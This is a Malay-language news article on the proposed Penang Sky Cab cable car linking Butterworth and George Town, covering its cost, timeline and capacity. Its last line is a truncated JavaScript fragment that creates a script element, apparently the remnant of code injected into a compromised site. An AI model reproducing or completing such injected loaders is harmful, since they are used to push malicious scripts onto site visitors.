Penang Sky Cab tingkat imej pelancongan negeri

GEORGE TOWNPenang Sky Cab berkonsepkan operasi kereta kabel yang dicadangkan pihak Penang Sentral Sdn. Bhd. (PSSB) kepada Kerajaan Negeri yang dijangka siap sepenuhnya pada tahun 2018 bakal menjadi tarikan pelancongan terbaharu di Pulau Pinang.

Serentak itu, perkhidmatan kereta kabel menghubungkan Seberang Perai dan bahagian pulau tersebut juga bakal menambah variasi mod pengangkutan di negeri ini.

Bagaimanapun, projek tersebut bakal menjadi alternatif kepada sistem pengangkutan awam sedia ada di Pulau Pinang dan bukannya sebahagian komponen Pelan Induk Pengangkutan Pulau Pinang (PIP) sebagaimana dilaporkan media arus perdana sebelum ini.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng berkata, projek usahasama Kerajaan Negeri dengan PSSB tersebut masih di peringkat eksplorasi dan bakal menjadi mercu tanda baharu kelak.

“Selain dapat meningkatkan imej pelancongan negeri ini, Penang Sky Cab merupakan bonus kepada warga Pulau Pinang sekaligus dapat memberi kemudahan dan berperanan sebagai alternatif mod pengangkutan ringan kepada orang ramai.

“Sekira segalanya berjalan lancar, secara teknikal projek dengan anggaran kos antara RM250 juta ke RM300 juta, ia dijangka siap sepenuhnya pada tahun 2018. Kerja-kerja pembinaan pula dijangka bermula selewat-lewatnya penghujung tahun 2016,” katanya pada sidang media di Komtar baru-baru ini.

Hadir sama, Exco Kerja Raya, Utiliti (Tenaga, Air & Telekom) dan Pengangkutan (Udara, Laut & Keretapi), Lim Hock Seng; Timbalan Pengarah Kejuruteraan Majlis Bandaraya Pulau Pinang (MBPP), Ir. A. Rajendran dan  Pegawai Kewangan Negeri, Datuk Mokhtar Mohd. Jait.

PSSB adalah anak syarikat Malaysian Resources Corporation Berhad (MRCB) yang ditubuhkan untuk membangunkan Penang
Sentral, sebuah pembangunan yang mengintegrasikan pembangunan komersial bercampur dengan hab pengangkutan bersepadu yang terbesar di kawasan utara Malaysia.

Menurut Guan Eng, dengan adanya Penang Sky Cab, Pulau Pinang dapat membangunkan hab baru bagi sistem pengangkutan awam bersepadu yang dapat mengintegrasikan perkhidmatan bas, teksi, feri, keretapi selain pembangunan komersial dan runcit di bawah Koridor Utara Hab Pengangkutan Awam.

“Sebaliknya projek Transit Aliran Ringan (LRT) dan Transit Laju Massa (MRT) adalah sebahagian komponen PIP yang dilihat mampu menyelesaikan masalah kesesakan lalulintas di Pulau Pinang untuk jangka masa panjang.

“Dalam erti kata lain, tidak ada keperluan untuk membuat permohonan kepada Kementerian Pengangkutan Malaysia kerana Penang Sky Cab adalah mod pengangkutan ringan yang hanya boleh membawa 10 orang penumpang dalam masa 15 minit sehala,” jelasnya.

Dalam pada itu, jurucakap PSSB, Shireen Mohd. Iqbal berkata, Penang Sky Cab akan merentasi Selat Melaka antara bahagian pulau dan Seberang Perai sejauh tiga kilometer.

“Selain menjadi produk pelancongan, Penang Sky Cab ini juga akan mengurangkan kebergantungan kita terhadap pengangkutan awam sedia ada dan ini selaras dengan hasrat Pulau Pinang ke arah sebuah negeri yang Bersih, Hijau, Sihat dan Selamat,” ujar beliau.

Penang Sky Cab akan menghubungkan Hab Pengangkutan Sentral Pulau Pinang, Butterworth (di bahagian Seberang Perai) ke Gat. Lebuh Nordin berdekatan Depoh Bas Rapid Penang (di bahagian pulau).

Direka khas bagi menampung 10 orang penumpang dalam satu gondola, Penang Sky Cab dijangka dapat menampung sehingga 2,000 orang penumpang dalam tempoh satu jam sehala dengan penyediaan 80 kabin.

Penumpang dapat menikmati pemandangan indah sepanjang 15 minit tempoh pejalanan.

Selain itu, penumpang juga boleh menikmati pemandangan indah melalui menara tinjau yang bakal dibangunkan di tengah-tengah lautan.

Maklum balas awam berkaitan Penang Sky Cab adalah dialu-alukan.

var d=document;var s=d.createElement(‘script’);